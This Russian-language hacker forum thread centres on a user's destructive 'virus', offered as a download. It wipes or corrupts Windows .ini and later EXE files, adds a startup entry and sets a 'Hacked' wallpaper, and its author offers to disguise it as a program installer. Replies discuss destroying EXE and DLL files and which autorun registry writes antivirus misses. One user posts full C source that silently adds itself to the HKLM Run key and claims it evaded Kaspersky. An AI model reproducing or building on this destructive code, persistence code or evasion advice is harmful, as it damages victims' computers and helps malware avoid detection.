Новый вирус Hunter snake's
 

Привет всем, вот наконец-то я в сети, эх. Вот набросал вирусняк(просто видел сравнительно недавно как кто-то кидал на форум вир свой, решил сделать также свой).
Его действия:
1)в папке windows стирает все содержимое файлов ini и дописывает строку:"It is marked with a virus the Sn@k3'a - "Hunter snake's"
2)Далее делает файл с знаменитым кодо" svhost.exe -s"в папочке по пути "C:\Documents and Settings\имя пользователя, который собственно и запустил вирус\Главное меню\Программы\Автозагрузк а" З.Ы. хотел вообщем в реестре заместит, но если винда всеровно будет не рабочая, то зачем....Тем более он в таком случае будет палиться каспером
3)и на последок решил оставить красивую картинку на рабочем столе =) с пожеланием и так всем известной словом Hacked =))). не удержался ))).
Вообщем так могу также данную программу наростить до любых размеров(в разумных пределах, у меня модем/в архиве ~40 кб, без него ~150 кб). Можно спрятать с любой программой, т.е. имитировать её установщик, нет проблем, крч ваши пожелания и добавления. Это не первый мой вирус, эх остальное убыло в небытие. Вообщем зацените вирус Hunter Snake's =).
скачать >>>

и попробуйте на себе... :). Нормально.

да ладно, можету кого-нибудь есть пробешенный комп или вторая винда =) но только на C:\. =).

хрень

коротко и ясно :)
киборг, для начала собственно протестируй , а уж после рассуждай

Вирьмейкеры йопта.... как писал Bug(o)r , это может сделать любой кто прочитает 50-70 страниц учебника по программированию...

Народ, WMvare рулит ;)

не позорьте слово "вирус". Ещё с таким видом пишешь, как будто прям кодер всия Руси.

Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...

Полностью согласен :)

Ссла битая

Ну и порожняк ! Ну вы бы еще bat-файлы с командами типа del *.* выкладывали ! И почитай 29A чтобы иметь хоть смутное представление о том ЧТО ТАКОЕ ВИРУС !

Хм,да ладно,человек может начинающий,решил выложить,узнать на верном ли он пути,а вы его грузите.Может следующий будет лучше...

а гляньте мой?
http://forum.antichat.ru/showthread.php?t=23156&goto=newpost

Не тупите, это не вирусы, а хреново написанный деструктивный ацтой.

tclover, полностью согласен.

Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.

а как в делфи сделать так чтоб он туды записался

зы
ссори шо не в тему...

зы сори шо нефтему

спасибо!!!!!
+ твой! не помешает...

tclover, чувак над было сразу опкодами написать :D

вот нормальное предложение, такс думаю проблема будет с отркытыми фафлами, а так можно и вместо ini Exe и dll спокойно валить, так что виндовс свалиться без проблем. я подумаю =)

бугагага вот именно я бы тогда и сделал в реестр, так как каспер, то и палит!!!!!!! это я ещё узнал давным давно, даже когда у меня был старый каспер!

ссыла обновилась! http://slil.ru/23069868
Кстати теперь он портит не ini, а EXE, что естественно выведет из строя винду

Горбатого могила исправит.

tclover И не говори +)
эй а ты чего тут делаешь? ты htnl выучил? )

Неа :( Возьми меня в ученики падшая сволоч!

ээээ чего-то ты разошелся, ты так низко пал =). а чего ругаешься? мы цывилизованные люди.

http://webfile.ru/1080663

Написана на языке С (Visual C), не делает ничего плохого - только заносит в реестр в ключ автозагрузки , откуда ее запустили под именем damned.
Проверь, Sn@k3, неужто Каспер вот прямо сходу несчастную программу выпалит?
----------------
#include<stdio.h>
#include<string.h>
#include<windows.h>

#pragma comment(linker,"/MERGE:.rdata=.text")
#pragma comment(linker,"/FILEALIGN:512 /SECTION:.text,EWRX /IGNORE:4078")
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(linker,"/NODEFAULTLIB")

//********************************************
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow)
{
int nSize;
char *file_path;
char *buf;

char **argv;
DWORD argc;

long int result;
HKEY hKey;

SetErrorMode(SEM_NOGPFAULTERRORBOX);

//******************************************
argv = CommandLineToArgvW(GetCommandLineW(), &argc);

buf = (char *)malloc(256);
file_path = (char *)malloc(256);

nSize = GetCurrentDirectory(256, buf);
buf[nSize + 1] = '\0';

sprintf(file_path, "%s\\%ws", buf, argv[0]);
result = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_ALL_ACCESS, &hKey);

// заносим в реестр .../Run под именем damned
RegSetValueEx(hKey, "damned", 0, REG_SZ, file_path, strlen(file_path));
RegCloseKey(hKey);

exit(0);
}

эх блин вирь писатель хренов
ты Че ВИрусоПисателей позориш та

по моему статья херовая

Клевер жоош
но кстати ты прав
СВОЛАЧАМ падшим не чего делать на ачате

Отжог ыыыыы пацотолом

хм... цИвилизованные правильно пишут это слово через И

Хм... Интересно, что на webfile.ru все файлы проверяются именно Касперским, мой откомлиленный "супертрой" свободно доступен - Касперский ничего не заподозрил.